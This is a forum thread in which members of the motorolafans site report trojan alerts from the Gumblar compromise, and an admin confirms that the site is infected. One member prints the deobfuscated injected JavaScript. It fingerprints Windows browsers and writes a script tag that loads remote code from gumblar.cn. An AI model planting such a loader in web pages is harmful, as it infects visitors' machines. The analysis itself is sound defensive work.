Motorolafans Infected with trojans and Malwares. Users and Admins please be aware!

[rachit2588]

i recently logged in to this new ((looks and hosted)) our motorolafans

i am using NORTON INTERNET SECURITY 2009.

Today my computer was attacked with trojan virus about every time i changed a topic on this website or log in or log out. any activity resulted in a trojan attack.
i am safe cuz NIS09 detected the stuff...

Requesting all the users and admins to make a note of this thing.

a red screen used to stop me from visitin this website but whenever i proceeded trojan attack was detected in my system

[rachit2588]

its something because motorolafans is hosted by gumblar.cn.....

[mananwala]

admins & mods

how risky is this n is it really true that the new site is infected??? i m using Symantec Anti Virus Corporate Edition, but i did not get any such alerts...

[wyrm]

Install linux and enjoy the malware free world.

The worst virus you have on your PC is the one you call "OS".

[Dark Avenger]

wyrm : LOL

stallman would be proud.

[swifty]

Requesting all the users and admins to make a note of this thing.

Thanks for the Report!
Yes, we are infected and working on it.
In the meantime, switch off javascript in your browser.

[wyrm]

funny! This is how the script looks after i removed the obfuscation. Its a redirect, i wonder what value j gets on vulnerable machines. I tried to open the page at gumblar.cn, but since i dont know how to figure a vulnerable j (no windows here) i cant download the trojan.

Code:

var j = "", u = navigator.userAgent;
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) {
    zrvzts="A";
    if (window.ScriptEngine)
        j = j + ScriptEngineMajorVersion() + ScriptEngineMinorVersion() + ScriptEngineBuildVersion() + j;
    document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
}

[wyrm]

And the script above is not the only infection on motorolafans.com, there is also other infections on templates/rt_mynxx_j15/js/rokmoomenu.js and templates/rt_mynxx_j15/js/mootools.bgiframe.js

At least they look like malware, its obfuscated javascript.

[swifty]

document.write("<script src=//gunblar.cn/rss/?id="+j+"><\/script>");

Good to see you have some fun with it.
btw.
It is gumblar not gunblar.

[wyrm]

fixed.

my JS interpreter was swallowing the "<script src=//gumblar.cn/rss/?id="+j+">" part, so i manually decoded it

The other 2 infections i reported just causes JS errors here. This one from gumblar works, but it seems to be Windows/IE specific, as i cant download the trojan from this URL.

I googled for it, and it seems to be spreading fast since 30/4, some people already downloaded the trojan, and it creates a "dwwin.exe" process on infected machines.

There are already 800+ domains infected with this. And just a minute ago when i tried to open gumblar.cn on linux/firefox(no anti virus software) i got a security alert, looks like the domain is already blacklisted (by whoever provides blacklisting for firefox/ubuntu).